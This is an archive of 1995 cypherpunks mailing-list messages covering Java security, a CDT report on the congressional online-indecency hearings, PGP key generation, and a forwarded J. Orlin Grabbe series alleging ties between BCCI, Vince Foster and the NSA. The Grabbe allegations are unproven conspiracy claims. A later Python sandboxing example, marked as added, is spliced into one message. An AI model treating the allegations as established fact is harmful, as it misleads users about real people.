development costs typically range from $300,000 to $600,000.

For ATO technologies that become productized, licensing rights are
estimated at $25,000 per licensee.

The OSF also sponsors other vendor efforts, known as PSTs, in
which vendors are closer to "productization" of their work, and
development costs tend to be higher, said Shaw.

Current PSTs include DCE 1.2 and Motif/CDE (Common Development
Environment). In addition, four potential PSTs are "being actively
pursued," Shaw maintained. "We expect to have some announcements
on these later this week," he added.

The PSTs will also be given their own area on the Open Software
Mall, to be known as PST Plaza.

Aside from the stores for Java, DCE Web, and Microkernel
Unification, the ATO Plaza will also include "Web pages for a
potpourri of (other) ATOs," according to Goldstein.

Additional areas of the Open Software Mall will include "Research
Plaza," the Motif/CD Store, and areas for tools, training, and
consulting.

The mall will officially open next Monday, Goldstein said. Initial
offerings will include an explanation of its goals and activities,
and the opportunity for user commentary. The mall will be
accessible from a pointer at http://www.org.com .

(Jacqueline Emigh/19950726/Reader Contact: Open Software
Foundation, 617-621-8700; Press Contact: Jane Smeloff,
OSF, 617-621-8997)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 28 Jul 95 12:41:57 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507281754.NAA11499@clark.net>
Message-ID: <9507281941.AA10821@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray wrote, responding to me:

| > 	I suspect Ray is working in an environment less security
| > 	I suspect Ray is working in an environment less security
| > conscious than Perry's.  Perry works on a lot of security-critical
| > applications where a lot of money is at stake.  If I were going to go
| > after financial institutions, I'd definitely look at which ones were
| > using Java, and see what I could upload into their systems.  Getting
| > copies of the recent files might be *very* informative.  I'd be
| > worried if I were at Solomon brothers.


|   If a business wants high security, they probably shouldn't be running
| anything but mail. Even allowing users ftp access is dangerous
| because someone could download a trojan horse. My college  took
| the /exec function out of IRC for this very reason. If data can 
| get  through a firewall by any means, DNS, mail, etc, it's possible to write
| some kind of program to send stolen information on those channels. Hell,
| there is a big enough problem with users bringing software from home
| into work and infecting company networks with viruses.

	FTP is available by mail.  So is web access.  Marcus Ranum
(formerly of TIS) has written a TCP/IP over SMTP. (He doesn't
distribute it.)

	The problem of securing a network in this environment is a
very difficult one.  Parts of it can be shown to be hard, although
partial solutions are possible.

	I suspect the risks are enhanced by easy to use clients, as is
the productivity of the workers.  Many experts recommend studying each
service and deciding whether or not to allow it based on a risk
assessment.  The size of Java makes it tough to evaluate, as does its
extensible nature.  I'm tempted to agree with Perry that it's too big
and doesn't have enough fail-safes yet.  I'd be much happier if the
Java execution environment did a chroot() before running any code, and
code went to the executor through a one way funnel.  Making this
funnel truly one way limits the nifty things you can do with Java
substantially.

|   Once you actually browse some HotJava web pages with HotJava, the
| ordinary Web becomes static and boring. It's like the difference between
| ftp and Netscape, or TinyMUD and LambdaMOO. There's just so much
| potential, especially for crypto-clients. Because Java provides a
| single development platform, single execution environment, GUI, and
| network access.

	No argument here.  I think Java is way nifty, and might be
enough of a killer app for me to upgrade to a powerPC mac.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
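
One way to arrange the chroot() and one-way funnel described in this message so that every failure ends in nothing being run, as an added example (not part of the original message and not how any Java runtime works). The uid 65534, the stand-in executor that only receives the bytes, and the sample jail directory are assumptions made for illustration.

```python
import os
import tempfile

NOBODY = 65534                       # assumption: conventional unprivileged uid/gid
CONFINED, REFUSED = "confined", "refused"


def _executor(jail):
    """Child side: confine first, read the code second, never fall back."""
    os.chroot(jail)                  # needs root or CAP_SYS_CHROOT
    os.chdir("/")                    # otherwise the cwd still points outside
    os.setgroups([])
    os.setgid(NOBODY)
    os.setuid(NOBODY)                # a process that stays root can leave a chroot
    if os.getuid() != NOBODY or os.listdir("/"):
        raise OSError("confinement check failed")
    code = b""
    while True:                      # fd 0 is the read end of the funnel
        chunk = os.read(0, 4096)
        if not chunk:
            break
        code += chunk
    # A real interpreter would run `code` here; this stand-in only receives it.


def run_confined(code, jail):
    """Hand `code` to a jailed child through a pipe and report the outcome."""
    r, w = os.pipe()
    pid = os.fork()
    if pid == 0:
        status = 1                   # the default outcome is refusal
        try:
            os.dup2(r, 0)            # the funnel becomes the only descriptor
            os.closerange(1, min(os.sysconf("SC_OPEN_MAX"), 65536))
            _executor(jail)
            status = 0
        except BaseException:
            status = 1               # any failure at all: run nothing
        finally:
            os._exit(status)
    os.close(r)                      # parent keeps only the write end
    try:
        view = memoryview(code)
        while view:
            view = view[os.write(w, view):]
    except BrokenPipeError:
        pass                         # child refused before reading
    finally:
        os.close(w)
    _, wstatus = os.waitpid(pid, 0)
    ok = os.WIFEXITED(wstatus) and os.WEXITSTATUS(wstatus) == 0
    return CONFINED if ok else REFUSED


if __name__ == "__main__":
    jail = tempfile.mkdtemp()        # constructed, empty jail directory
    os.chmod(jail, 0o755)            # must stay readable after the uid drop
    print(run_confined(b"constructed applet bytes", jail))
```

Run without root, the chroot() call fails and the result is `refused`; the only information that travels back from the child is its exit status.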




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher E. Stefan" <flatline@ironhorse.com>
Date: Fri, 28 Jul 95 15:52:11 PDT
To: Cypherpunks List <dc-stuff@fc.net>
Subject: CDT report on Senate and House hearings on Online Pornography
Message-ID: <Pine.LNX.3.91.950728154812.3514F-100000@caboose.ironhorse.com>
MIME-Version: 1.0
Content-Type: text/plain



Somewhat interesting it seems, an ultra-conservative House is the First
Amendment's biggest friend on the Online "porn" issue, while a much more
moderate Senate is its biggest enemy ... 

-- 
Christopher E Stefan  *  flatline@ironhorse.com  *  finger for PGP key

---------- Forwarded message ----------

-------------------------------------------------------------------------------
------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************
  **         **      **       ***               POLICY POST
  **         **      **       ***
  **         **      **       ***               July 26, 1995
  **         **      **       ***               Number 22
  ********   *********        ***
   ******    ********         ***

  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 22                       July 26, 1995

CONTENTS: (1) Senate Judiciary Committee Holds Cyberporn Hearing
          (2) House Science Subcommittees Hold Hearing to Explore 
              Parental Control Technology -- Law Enforcement Officials 
              Say Exon CDA is Wrong Approach
          (3) Subscribe To The CDT Policy Post Distribution List
          (4) About CDT, Contacting US

This document may be re-distributed freely provided it remains in its
entirety.
-------------------------------------------------------------------------

(1) SENATE JUDICIARY COMMITTEE HOLDS CYBERPORN HEARING

SUMMARY

On Monday July 24, 1995 the Senate Judiciary Committee held the first ever
hearing on the issue of children's access to inappropriate material on the
Internet. The principal focus of the hearing was to discuss Senator
Grassley's "Protection of Children from Computer Pornography Act of 1995"
(S. 892). CDT Executive Director Jerry Berman testified before the panel.

Senator Grassley (R-IA) deserves praise for holding the first Congressional
hearing on this important issue, as well as for taking great pains to
ensure that both sides of the issue were represented. Although CDT may
disagree with Senator Grassley's approach, we believe that this hearing
represented an essential step towards advancing the dialogue on what has
become an over-hyped and dramatically misunderstood issue.

Senator Grassley's legislation, which has been co-sponsored by several
other prominent members such as Dole, Hatch, and Thurmond, would impose
criminal penalties on a service provider that "knowingly" transmits
indecent material to a minor, or who "willfully" permits its network to be
used to transmit indecent material to a minor (S. 892, Sec (b)(2) &
(b)(3)). 

Two important points emerged from the testimony:

1. Current law prohibits the distribution of obscenity and child
   pornography, as well as online stalking and solicitation of minors.
   As troubling and disturbing as some of the testimony was, no evidence
   was presented that there are gaps in current law which would be
   filled by the Grassley legislation.
 
2. Serious questions exist as to the constitutionality of the Grassley
   Bill. Although Senator Grassley has repeatedly stated that his bill is
   narrowly drawn and targets only the bad actors, no evidence was
   presented to establish that a court would not interpret the statute 
   more broadly, resulting in a complete ban on constitutionally 
   protected speech online.

WITNESSES

Witnesses testifying before the panel included:

* Donnelle Gruff, a 15 year old Florida girl described as a victim of an
  online stalker,
* Patricia Shao, a mother of two from Baltimore MD and volunteer for
  Enough Is Enough
* Dr. Susan Elliot, a mother from McLean VA

* Bill Burrington, Assistant General Counsel, America Online
* Barry Crimmins, a children's rights advocate
* Stephen Balkam, Executive Director, Recreational Software Advisory
  Counsel

* Jerry Berman, Executive Director, Center for Democracy and Technology
* Michael S. Hart, Executive Director of Project Gutenberg, Professor of 
  Electronic Texts, Illinois Benedictine College
* Dee Jepson, Enough Is Enough (an anti-pornography group)

DOES THE GRASSLEY BILL PROTECT CHILDREN?

The testimony of 15 year old Donnelle Gruff focused on her experience as
the victim of a stalker, while Dr. Elliot and Ms. Shao, two mothers of
young children, described how their children had used commercial online
services to access files they deemed inappropriate. 

Donnelle Gruff testified that she had been harassed and stalked by the
sysop of a Florida BBS she had visited. The sysop had obtained her name,
age, and address from her records and reportedly stalked Gruff while she
was at home.

During questioning however, Gruff's step-father told Senator Leahy that
Florida law enforcement officials were currently investigating the case,
and that they had given no indication that current law is insufficient with
respect to prosecuting such cases. Senator Leahy noted that, as difficult
and disturbing as Gruff's case is, it illustrates a need for additional law
enforcement resources and education, but is not an issue of gaps in current
federal or state laws. Senator Patrick Leahy (D-VT) noted similar recent
prosecutions in Florida, and noted that the Grassley legislation does not
explicitly prohibit online stalking of minors.

In addition, Senator Leahy questioned whether government content
restrictions would be an effective solution to protecting children online.
"I hear a lot of rhetoric (from Congress) about getting government out of
our lives, but here it seems as if the rhetoric is a little off of reality.
Parents, not the government, should make the choices" about what their
children should be permitted to access.

Both Dr. Elliot and Ms. Shao testified that their children had stumbled
across material while surfing the Internet that they, as parents, felt
should not be accessible to children. Both described how their children had
accessed "pornographic" images, and had been propositioned for "cybersex"
while visiting a chat room on a commercial online service. In addition, Dr.
Elliot described some of the images as representing 'bestiality and
sodomy'.

Barry Crimmins, a child protection advocate, testified that he has found
numerous images of child pornography on America Online. Crimmins accused
AOL of neglecting to adequately police its network. When questioned by
Senator Leahy, Crimmins acknowledged that the distribution of child
pornography and stalking or solicitation of minors is prohibited under
current law. Crimmins added that while he thought the commercial online
service should do more to remove such material, he believes that more
vigorous enforcement of existing law would help to address his concerns.

WHAT IS THE SCOPE OF THE ISSUE -- IS CURRENT LAW SUFFICIENT?

Often in the course of the debate on this issue, the term "pornographic" is
assumed to be interchangeable with both "indecency" and "obscenity".
However as Senator Feingold (D-WI) noted, "pornography" has no legal
standing, and when legislating in this area Congress must be careful to
avoid confusing these legal distinctions. 

In determining what material would be considered illegal under current law,
the distinction between "obscene" and "indecent" material must be made
completely clear. When pressed by Senator Feingold, Dr. Elliot agreed that
precise definitions are important, but argued that the files that her child
downloaded from the Internet that depicted bestiality and sodomy would
be "obscene by any standard". 

Images of bestiality and sodomy, as Dr. Elliot described, would be
considered obscene in virtually every community in the United States, and
hence are illegal under current law. Though it raises difficult
jurisdictional questions, obscenity has been clearly defined by the Courts.
Moreover, current laws that already prohibit trafficking in obscenity (18 USC
Sec 1462, 1464, 1466) as well as child pornography (18 USC Sec 2252) have
been successfully applied to punish conduct on computer networks. As
Senator Leahy pointed out in his statement, the Justice Department is
currently prosecuting cases involving material similar to that described by
Dr. Elliot.

Indecent material, on the other hand, is constitutionally protected and is
much more difficult to define. The most common understanding of what
constitutes indecent material includes the 7 dirty words, images of nudity,
and other suggestive material. Moreover, the Supreme Court has ruled that
any attempts by government to restrict access to indecent material must be
accomplished in the "least restrictive means", and the determination of
this standard is entirely dependent on the medium (see Sable Communications
v. FCC, 492 US 115; 109 S.Ct. 2829; 106 L.Ed. 2d 93 (1989)). 

Some of the material described by the witnesses would be considered
obscene, and hence is already prohibited under current law. Other examples,
including Ms. Shao's description of her daughter being propositioned for
"cybersex", would likely not be considered obscene. 

Senator Russ Feingold (D-WI) urged the committee to carefully consider the
distinctions between "obscene" and "indecent" speech, and urged his
colleagues to "exercise caution and restraint." 

How broadly should we define indecency, Feingold asked Dr. Elliot, "Where
should we draw the line? Should we prohibit Playboy? swearing? The Catcher
In The Rye? What about a discussion forum about how to avoid getting
AIDS?". 

Because technologies currently exist to screen out messages such as those
described by Ms. Shao, it is unlikely that a broad prohibition on such
messages would pass constitutional muster. In this case, Congress must look
to other, less restrictive methods of preventing children from having
access to such materials -- including promoting the development and
availability of user control technologies.

CONSTITUTIONAL ISSUES

Throughout the hearing, Senator Grassley stated that his legislation is
carefully crafted and narrowly drawn in order to preserve the first
amendment rights of adults while protecting children from inappropriate
material. Grassley stated that his bill would hold an online service
provider liable only in cases where they "knowingly" allow their network to
be used to transmit indecent material to a minor or "willfully" allow an
individual to use their network to do so. 

However, as CDT's Jerry Berman and America Online's Bill Burrington argued,
the wording of the statute and the variety of possible interpretations
could lead to a severe chilling effect on the free flow of legitimate
information in cyberspace and force online service providers to limit or
remove certain areas of their service.

BROAD KNOWLEDGE REQUIREMENT

The scope of the "knowing" standard in the Grassley bill is an issue of
some dispute. Senator Grassley and his staff maintain that it is intended
to apply narrowly, but no evidence was presented that demonstrated why a
court would apply a narrow interpretation. Instead, a court is likely to
interpret the "knowing" requirement broadly.

Berman cautioned that because of this uncertainty, online service providers
would be forced to rely on the broadest possible interpretation of the
statute in order to avoid liability, resulting in a severe chilling effect
on all online communications:

"The threat of a broad interpretation of this new statute would compel all
who provide access to the Internet to restrict *all* public discussion
areas and public information sources from subscribers, unless they prove
that they are over the age of eighteen.  Under this statute, a service
provider could not even provide Internet access to a minor *with the
approval* of the child's parent.  Since every online service provider would
have to similarly restrict access to minors, this proposed statute would
create two separate Internets, one for children and one for adults."

America Online's Bill Burrington agreed, stating that the potential for a
broad interpretation of the statute would compel AOL and other online
service providers to adhere to the broadest possible reading in order to
avoid potential liability.  Burrington argued that would force AOL to shut
down many parts of their service and place providers in the unenviable
position of national censor.

"Constitutional guarantees of free speech and press should be cautiously
guarded," Burrington stated, "The online service provider industry should
be encouraged to provide *voluntary* editorial control over its service and
to continue its research and development of parental empowerment technology
tools.  This industry should not be cast in the role of national censor,
determining which information may be fit for children, but nonetheless
subject to criminal liability if it guesses incorrectly in any given
instance." 

Senator DeWine (R-OH) asked several questions of many of the witnesses, and
expressed concern about the potential for an overly broad interpretation
of the knowledge standard.

BROAD INTERPRETATION OF 'INDECENCY'

As addressed earlier, a precise definition of 'indecent' speech has 
never been firmly established, and whether material would be considered
indecent depends largely on the nature of the medium it is communicated
through. Because of this, and because under the Grassley bill carriers
would be liable for transmitting indecent speech, carriers would be forced
to adhere to the broadest, most inclusive definition of indecency. This
would include, among other things, the 7 dirty words, description of
genitalia, nudity, and other material which is protected in other media.

This issue was raised by Michael Hart, Executive Director of Project
Gutenberg, who stressed that broad restrictions on indecency would prevent
people from enjoying serious works of fiction on the Internet. Project
Gutenberg makes electronic texts of books available on the Internet. Hart
stated, with great emotion, that the proposed indecency restrictions
contemplated by the Grassley bill would force him to remove some of
Shakespeare's plays, The Catcher In The Rye, Lady Chatterley's Lover, Alice
in Wonderland, and other books which have been classified as indecent in
some parts of the United States. Although such an effect may not be
intended by the drafters of the Grassley legislation, no evidence was
offered at the hearing to counter Mr. Hart's concerns.

EXON vs. BERMAN

CDT's Jerry Berman urged the Committee to act cautiously before voting to
further restrict First Amendment guarantees of freedom of speech.  Berman
urged the Senate to fulfill its traditional role as the "deliberative
body", and to carefully consider the implications before enacting broad new
statutes to cover new media.  Referring to both the Exon CDA and the
Grassley bill, Berman stressed that the country would be better served if
the Senate did not enact legislation simply to "provide the illusion that
the United States Senate could do something in this area".

This remark drew a sharp rebuttal from Senator Exon, who, though not a
member of the Judiciary Committee, sat in on the hearing on the invitation
of Senator Grassley.  Exon defended his bill and accused CDT and others of
launching "vicious attacks" against him and his legislation. Berman was not
given a chance to respond.

"We are concerned about the situation", Exon argued, yet "we are viciously
attacked for trying to have a rational discussion.  We don't want to create
a false sense of security [but] we have a responsibility to protect
children".  In addition, Exon dismissed parental control technologies as
too little too late, arguing that "for every block there is a way around
that block", and that such technologies may not be available in every home,
allowing children to access inappropriate material at the homes of
neighbors who may not employ such tools.

WHAT WAS LEARNED?

Although the hearing did illustrate that sexually explicit material can be
found on the Internet, no substantial evidence was presented to indicate
that law enforcement is currently unable to prosecute violations of
obscenity, child pornography, stalking, or child solicitation laws.
Moreover, although Senator Grassley intends his legislation to be narrow,
serious questions were raised about whether other, more broad
interpretations are possible. 

In our opinion, the hearing illustrated that current law is sufficient to
prosecute those who stalk or solicit children online, and that complex
constitutional issues are raised by congressional attempts to restrict
indecent material on the Internet.
 
PATHS TO RELEVANT DOCUMENTS

Testimony is available for most of the witnesses from CDT's Communications
Decency Act Issues page*:

  URL:http://www.cdt.org/cda.html

or from our ftp archive*:

  URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech

*Due to the volume, these materials may take several days to appear on our site.

---------------------------------------------------------------------------

(2) HOUSE SCIENCE SUBCOMMITTEE HOLDS 'PARENTAL CONTROL TECHNOLOGY' HEARING

Two subcommittees of the House Science Committee held a joint hearing 
today (July 26, 1995) on the availability of parental control technologies
to prevent children from accessing inappropriate material on the Internet.
The hearing, held by the Subcommittee on Basic Research, Chaired by Rep.
Schiff (R-NM) and the Subcommittee on Technology, Chaired by Rep. Constance
Morella (R-FL) provided an important counter-balance to Monday's Senate
Judiciary Committee Hearing.

Witnesses testifying before the committee included:

Witnesses Demonstrating Technology Solutions

* Tony Rutkowski, Executive Director of the Internet Society
* Ann Duvall, President of SurfWatch Software
* Steve Heaton, General Counsel and Secretary, Compuserve

Law Enforcement Witnesses

* Kevin Manson, Federal Law Enforcement Training Center
* Mike Geraghty, Trooper, New Jersey State Police
* Lee Hollander, Assistant States Attorney, Naples Florida

LAW ENFORCEMENT OFFICIALS SAY CURRENT LAW SUFFICIENT, EXON BILL FLAWED

Today's hearing marked the first time law enforcement officials have
testified on the issue of children's access to inappropriate material on
the Internet. All three law enforcement witnesses agreed that, in their
experience, current law is sufficient to prosecute online stalking,
solicitation of minors, and the distribution of pornography and child
pornography. All three said that they are vigorously prosecuting such
cases. 

Instead of enacting new law, New Jersey State Trooper Mike Geraghty said
that protecting children is "a matter of training law enforcement officers,
prosecutors, lawyers and judges about how to enforce existing laws [with
respect to computer networks]. The laws are good, we have to learn how to
enforce them".

The three law enforcement witnesses further argued that the Senate-passed
Exon/Coats Communications Decency Act is the wrong approach to addressing
an issue that is already covered under existing law. "I have several
problems with the Exon bill as a prosecutor, both in terms of its practical
enforcement and its constitutionality" said Florida Assistant States
Attorney Hollander.

TRANSACTIONAL PRIVACY PROTECTIONS CRITICIZED

In a slightly unrelated aside, Florida Assistant States Attorney Lee 
Hollander criticized privacy protections for online transactional
information as a hindrance to law enforcement. 

As part of last year's Digital Telephony legislation, the standard for law
enforcement access to online transactional records (logs that indicate what
files an individual accessed from online archives and electronic mail
transactions) was raised from a requirement of a mere subpoena to a court
order from a judge based on the showing of "specific and articulable facts"
that such records are "relevant and material to an ongoing criminal
investigation". The higher standard was widely seen as a victory for online
privacy.

In response to a question of what Congress could do to help aid enforcement
of existing law, Hollander noted that the higher standard for online
transactional records adds an additional burden to law enforcement
investigations. Calling it part of a "balance between privacy and law
enforcement", Hollander did not suggest that Congress should repeal the
court order requirement, only that it made prosecutions more difficult
(*NOTE: Members of CDT staff worked closely on this issue, and consider the
court order standard to be a tremendous victory for online privacy).

EXON CDA CONDEMNED BY ALL

Condemnation of the Senate-passed CDA was not limited to the law
enforcement witnesses. Not a single member of the Subcommittee stated
support for the CDA, and all expressed concern that the issue had not
received sufficient public consideration by Congress. 

Chairwoman Morella stressed that Congress should consider technological
options to empower parents to exercise control over what their children
access online before rushing to enact new laws. Rep. Geren (D-TX) expressed
concern about the First Amendment implications of the CDA. Rep. Vern Ehlers
(R-MI) stated that he would "oppose bills that make network access
providers (legally) responsible for the content they carry". In what was
perhaps the strongest condemnation of the Senate-passed Communications
Decency Act, Rep. Zoe Lofgren (D-CA) said, "While well intentioned, the
Exon bill is a totally wrong approach and a complete misunderstanding of the
Technology."

PARENTAL CONTROL TECHNOLOGY IS THE ONLY EFFECTIVE SOLUTION

Internet Society Executive Director Tony Rutkowski provided Committee
members with a basic overview of the Internet and described how the Internet
Society (ISOC) and Internet Engineering Task Force (IETF) are currently
looking at content tagging and other voluntary rating systems for future
Internet protocols. Rutkowski stressed that centralized, command and
control style content restrictions would be ineffective in the global,
distributed network environment of the Internet. Rutkowski further noted
that objectionable material constitutes a minuscule amount (less than .05%)
of the total traffic on the network. 

Because of the global reach of the Internet and the millions of potential
content providers, Rutkowski argued, the only effective means of addressing
the availability of inappropriate material is to provide user control
applications to empower parents to block and filter what they and their
children access. 

SurfWatch President Ann Duvall demonstrated SurfWatch and described the
product as "just one example of the computer industry responding to needs
created by the explosive growth of technology".  Duvall stressed that the
industry is developing solutions which are simple to use, inexpensive, and
empower parents to make their own choices about what they or their children
should see. 

Expressing concern about legislative efforts to control content online,
Duvall noted that 30% of the sites blocked by SurfWatch reside outside the







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Fri, 28 Jul 95 08:24:02 PDT
To: cypherpunks@toad.com
Subject: Re: Hooks to Crypto
In-Reply-To: <9507281401.AA26689@all.net>
Message-ID: <Pine.SOL.3.91.950728162002.20916B-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jul 1995, Dr. Frederick B. Cohen wrote:

> Philo Zimmerman would almost certainly
> win if they ever took him to court, but by harassing him in this more
> subtle way, they destroy the impact of PGP in the marketplace, get MIT
> to support an official (and perhaps customized for the NSA to have weak
> keys) version,

I've personally pulled apart the innards of both MIT pgp 2.6.2 and the 
non-MIT pgp 2.6.2i in order to generate large primes and full RSA keys.  

There are no hacks in MIT pgp that cause it to generate weak keys.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 28 Jul 95 14:27:15 PDT
To: cypherpunks@toad.com
Subject: <plonk> now!  Grabbe, X, re. Foster, NSA, BCCI, etc.
Message-ID: <Pine.SOL.3.91.950728171939.22819C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 28 Jul 1995 15:49:28 -0400 (EDT)
From: KALLISTE@delphi.com
To: bdolan@use.usit.net
Subject: Part X: Allegations re Vince Foster, the NSA, and Bank Spying

-----BEGIN PGP SIGNED MESSAGE-----

	 Allegations Regarding Vince Foster, the NSA, and 
	       Banking Transactions Spying, Part X

		     by J. Orlin Grabbe

***********************************************************************
* I received a call from Mr. Stephen Ganis, counsel to the House      *
* Committee on Banking and Financial Services, who assures me that    *
* he did NOT provide Jim Norman's article to Mr. Charles O. Morgan,   *
* attorney for Alltel Information Services, but rather called Mr.     *
* Morgan *after* the *Media Bypass* article had appeared, to get      *
* Morgan's side of things.  Mr. Morgan was apparently not aware       *
* that the article had been published, and that was the only          *
* information he received from Mr. Ganis.  Mr. Ganis assures me       *
* that his group is NOT passing any information to Alltel, but is     *
* in fact carefully keeping all sources and information confidential. *
***********************************************************************
     
       What do nuclear weapons, money laundering, covert operations, 
money management, clandestine payments of payola and kickbacks, and the 
systematic monitoring of bank loans and bank wire transfers have in common? 

       The answer begins with BCCI: the Bank of Credit and Commerce 
International. BCCI connects the Israeli bomb to the Pakistani bomb to 
suppliers of banking software like Systematics, and to a very dead money 
launderer named Vince Foster.  

       Don't misunderstand the latter statement: I believe we should all 
have the right to "launder" money. The money-laundering laws are a 
frightening, Big-Brotherly intrusion into financial privacy (see J. Orlin 
Grabbe, "The End of Ordinary Money, Part II: Money Laundering, Electronic 
Cash, and Cryptological Anonymity"). 

       But why is there one standard of legislated "morality" that applies, 
say, to a LEADING OFFICIAL OF THE FEDERAL RESERVE SYSTEM, and another 
standard that applies to everyone else?  
       
       In 1972 Pakistani banks were nationalized by President Bhutto. One   
of these banks was United Bank, whose president was Agha Hasan Abedi.           
Abedi subsequently joined with Sheik Zayad, ruler of Abu Dhabi and patron
of the PLO, to found BCCI.  To prevent nationalization, BCCI was chartered 
in Luxembourg.  In 1975 it split into two entities, one remaining in 
Luxembourg and the other established in the Cayman Islands.  The Cayman 
Islands part became a "bank within a bank."  While the legal registration  
was in Luxembourg and the Cayman Islands, the actual operational
headquarters was moved to London.

       In 1976 John Heimann, New York superintendent of banking, turned down 
BCCI's attempt to buy Chelsea National Bank in New York.  (Shareholders in 
the bank included former Mayor Robert Wagner and the Finley, Kumble law 
firm.)  The actual purchase attempt was made by one of the Gokal brothers
of shipping fame, Abbas Gokal, using a loan from his sister.  Banking
experience was to be provided by BCCI, but Heimann refused to approve the
purchase, despite several meetings with Abedi.  Abedi realized that BCCI
would not be able to enter the U.S. market under its own name.
	
	Abedi's attention was then brought to bear on Financial General, a 
Washington D.C.-based bank with headquarters a block from the White House.  
The bank had been acquired in April 1977 by an investor group led by 
William Middendorf II, who was Secretary of the Navy under Nixon and Ford.  
One member of the investor group was Jackson Stephens.  Stephens then sent 
salesmen from his Little Rock firm *Systematics* to talk to Middendorf 
about providing banking software for Financial General, but they were firmly 
rejected.  Stephens decided to wrest control of the bank from Middendorf.
				       
       Jackson Stephens is a billionaire from Little Rock who owns the 
controlling interest in Worthen National Bank as well as in Stephens Inc., 
one of the largest privately owned investment banks outside Wall Street. 
In November 1977, he introduced BCCI-founder Abedi to Bert Lance, Carter's 
Director of the Office of Management and Budget, whom Stephens had met 
through Jimmy Carter, his old roommate from Naval Academy days. (Lance and 
Stephens, two Southern Baptists, had hit it off.)  Lance also knew the 
people at Financial General, for it was Financial General that had sold 
to Lance controlling interest in the National Bank of Georgia in 1975. 

       Abedi in turn introduced Lance to Stanford-and-Harvard-(and Colorado 
School of Mines)-educated Ghaith Pharaon.  Pharaon proceeded to acquire the 
stock of Bert Lance's National Bank of Georgia, a deal consummated on January 
5, 1978, a day after Lance's $3.4 million loan from the First National Bank 
of Chicago was repaid by BCCI London.  Pharaon was apparently acting on 
behalf of Abedi in the acquisition, at least in part.
								    
       By then Lance had left the Carter administration, and he and Jackson 
Stephens joined together to help BCCI take over Financial General.  A 
Financial General lawsuit filed on February 17 named "Bert Lance, Bank of 
Credit & Commerce International, Agha Hasan Abedi, Eugene J. Metzger, 
Jackson Stephens, Stephens Inc., Systematics Inc. and John Does numbers 1 
through 25." Systematics was represented by C.J. Giroir, Webster Hubbell, 
and Hillary Rodham Clinton of the Rose Law Firm of Little Rock:

	"The suit was ultimately settled, but intriguingly, briefs for 
	Systematics, a Stephens property, were submitted by a trio of 
	lawyers including C.J. Giroir and Webster L. Hubbell and signed 
	by Hillary Rodham" ("Who is Jack Ryan?" *The Wall Street Journal*, 
	August 1, 1994).

       This BCCI-Lance-Stephens-Systematics-Hubbell-Clinton connection will 
continue to reappear in our story.        
						  
	Edwin McAmis, an attorney for Financial General, deposed Lance in 
connection with the stockholder civil suit, and turned up a mysterious loan:

	"The loan could have been for as much as $3.4 million . . . and
	came from London's Bank of Credit & Commerce International, on 
	whose behalf Lance had approached Financial General with a bid 
	for control. . . . Lance said he used it last January to pay off 
	his celebrated $3.4 million loan from the First National Bank of 
	Chicago . . . The latest loan, he said was arranged by Agha Hassan 
	Abedi, an energetic Pakistani who heads B.C.C.I.
	"Collateral?  None.
	"Documents?  Well, no, though Lance's lawyer, Robert Altman,
	says some are being drawn up now." 
	(quoted from "Another 'Loan' for Lance," *Time*, April 3, 1978.)
				     
       Bert Lance had approached Financial General on behalf of BCCI London 
with a bid for control of the bank. Lance was also responsible for 
introducing BCCI founder Abedi to Jimmy Carter, and for bringing Clark 
Clifford in on the take-over attempt. Ghaith Pharaon was another investor 
in the deal.   

       Also involved in the successful BCCI takeover were Clark Clifford 
(the former Defense Secretary under Johnson and lawyer for BCCI), Robert 
Altman (attorney for Bert Lance and Clifford's partner), and Kamal Adham 
(the former head of Saudi Arabian intelligence who was King Faisal's most 
trusted advisor, and whose half-sister Iffat was King Faisal's favorite 
wife).  Kamal Adham and Ghaith Pharaon had built the Hyatt hotel in Riyad, 
and Adham had originally introduced Pharaon to Abedi.  

	Adham and Pharaon (along with Faisal al-Fulaij and Abdullah Darwaish) 
owned KIFCO, the Kuwaiti International Finance Company (James Ring Adams & 
Douglas Frantz, *A Full Service Bank: How BCCI Stole Billions Around the 
World*, Pocket Books, 1992, p. 52).
				
       In a lawsuit filed March 18, 1978, the Securities and Exchange 
Commission charged Lance with violations of federal security laws, and
BCCI's application to purchase Financial General Bankshares was denied.  
Abedi then formed a new takeover vehicle, Credit and Commerce American
Holdings (CCAH), based in the Netherlands Antilles.  The largest investor  
in CCAH was Kamal Adham, who put up $13 million of his own money.  On October 
19, 1978, CCAH filed for approval with the Federal Reserve to purchase 
Financial General.  This application was dismissed on February 16, 1979, 
due to opposition from Financial General's Maryland subsidiary, but a new 
application was submitted later.

	The Federal Reserve finally approved the purchase on April 19, 
1982, and BCCI renamed the bank "First American" three months later. Clark 
Clifford was made chairman and Robert Altman president.  The head of Bank 
Supervision at the Federal Reserve when BCCI's purchase was approved was 
Jack Ryan, who later became head of the Resolution Trust Corporation, in 
which role he denied Rep. Leach's requests for documents related to Madison 
Guaranty, the Whitewater thrift. 

       What was the point of BCCI's takeover of First American? 
" 'They wanted an important stake across the street from the White House,' 
says one Washington banking executive, adding, 'Some people might think it 
is important to know about the outstanding loans and balances of Government 
officials'" (*Time*).
							
       Abedi used his new-found connections to Jimmy Carter to publicize
BCCI to heads of state around the world.  Abedi made his personal 727 jet 
